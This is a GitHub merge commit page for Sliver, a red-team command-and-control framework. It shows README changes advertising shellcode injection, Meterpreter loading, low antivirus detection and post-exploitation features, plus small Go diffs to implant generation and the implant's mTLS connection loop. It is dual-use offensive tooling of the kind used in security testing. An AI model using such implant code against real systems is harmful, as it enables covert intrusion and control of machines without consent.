Skip to content

Commit

Permalink
Merge branch 'master' into execute-assembly
Browse files Browse the repository at this point in the history
  • Loading branch information
rkervella committed Feb 20, 2019
2 parents 05be658 + 80603d7 commit 1dd85c9
Show file tree
Hide file tree
Showing 4 changed files with 54 additions and 19 deletions.
33 changes: 23 additions & 10 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -5,21 +5,34 @@ Sliver

Sliver is a remote shellcode loading and injection service that uses end-to-end encryption (mTLS) for all network traffic. Implants are dynamically compiled with unique X.509 certificates signed by a per-instance certificate authority generated when you first run the binary. Sliver can load arbitrary shellcode but also integrates with MSFVenom to automatically generate, execute, and manage Meterpreter payloads. Sliver binaries have very low anti-virus detection as they do not contain any malicous code themselves and instead dynamically load it over the network.

Sliver can inject payloads into it's own process or optionally use remote thread injection to execute payloads in a remote processes to which your execution context has access.
Sliver can inject payloads into it's own process or optionally use remote thread injection to execute payloads in a remote processes to which your execution context has access.

```
[attacker] <-(mTLS)-> [sliver] -(code injection)-> [remote process]
```
### Feature Progess

Sliver is designed to be secure-by-default and have as few dependancies as possible.
#### C2
- [x] Mutual TLS
- [x] Encrypted DNS
- [ ] HTTP(S)
- [ ] ICMP

### Setup
#### Chain Loader
- [x] Raw Shellcode
- [x] .NET Assemblies
- [x] Metasploit/Meterpreter (v5 or later)
- [ ] Empire
- [ ] Cobalt Strike

1. Install Metasploit Framework v5 or later (if you want to use MSF features)
2. Download the latest [Sliver](https://github.com/BishopFox/sliver/releases) binary
3. ???
4. Shellz
#### Post Exploitation
- [x] Windows Token Manipulation
- [x] Procdump
- [ ] TCP tunnels
- [ ] Reverse SOCKS proxy

### Setup

1. Download the latest [Sliver](https://github.com/BishopFox/sliver/releases) binary
2. ???
3. Shellz

## Compile From Source

Expand Down
28 changes: 22 additions & 6 deletions client/command/sliver.go
Original file line number Diff line number Diff line change
Expand Up @@ -180,8 +180,8 @@ func info(ctx *grumble.Context, rpc RPCServer) {
}

func generate(ctx *grumble.Context, rpc RPCServer) {
targetOS := ctx.Flags.String("os")
arch := ctx.Flags.String("arch")
targetOS := strings.ToLower(ctx.Flags.String("os"))
arch := strings.ToLower(ctx.Flags.String("arch"))
lhost := ctx.Flags.String("lhost")
lport := ctx.Flags.Int("lport")
debug := ctx.Flags.Bool("debug")
Expand All @@ -194,13 +194,29 @@ func generate(ctx *grumble.Context, rpc RPCServer) {

save := ctx.Flags.String("save")

if lhost == "" {
fmt.Printf(Warn+"Invalid lhost '%s'\n", lhost)
/* For UX we convert some synonymous terms */
if targetOS == "mac" || targetOS == "macos" || targetOS == "m" {
targetOS = "darwin"
}
if targetOS == "win" || targetOS == "w" || targetOS == "shit" {
targetOS = "windows"
}
if targetOS == "unix" || targetOS == "l" {
targetOS = "linux"
}
if arch == "x64" || strings.HasPrefix(arch, "64") {
arch = "amd64"
}
if arch == "x86" || strings.HasPrefix(arch, "32") {
arch = "386"
}

if lhost == "" && dnsParent == "" {
fmt.Printf(Warn + "Must specify --lhost or --dns\n")
return
}
if save == "" {
fmt.Printf(Warn + "Save path required (--save)\n")
return
save, _ = os.Getwd()
}

// Make sure we have the FQDN
Expand Down
3 changes: 1 addition & 2 deletions server/console/console-players.go
Original file line number Diff line number Diff line change
Expand Up @@ -74,8 +74,7 @@ func newPlayerCmd(ctx *grumble.Context) {
}

if save == "" {
fmt.Printf(Warn + "Save file required (--save)\n")
return
save, _ = os.Getwd()
}

fmt.Printf(Info + "Generating new client certificate, please wait ... \n")
Expand Down
9 changes: 8 additions & 1 deletion sliver/sliver.go
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,10 @@ package main
import (
"crypto/x509"
"flag"

// {{if .MTLSServer}}
"io"
// {{end}}
"os"
"os/user"
"runtime"
Expand Down Expand Up @@ -71,13 +74,17 @@ func startConnectionLoop() {
// {{end}}
connectionAttempts := 0
for connectionAttempts < maxErrors {
err := mtlsConnect()
var err error

// {{if .MTLSServer}}
err = mtlsConnect()
if err != nil {
// {{if .Debug}}
log.Printf("[mtls] Connection failed %s", err)
// {{end}}
}
connectionAttempts++
// {{end}}

// {{if .DNSParent}}
if dnsParent != "" {
Expand Down

0 comments on commit 1dd85c9

Please sign in to comment.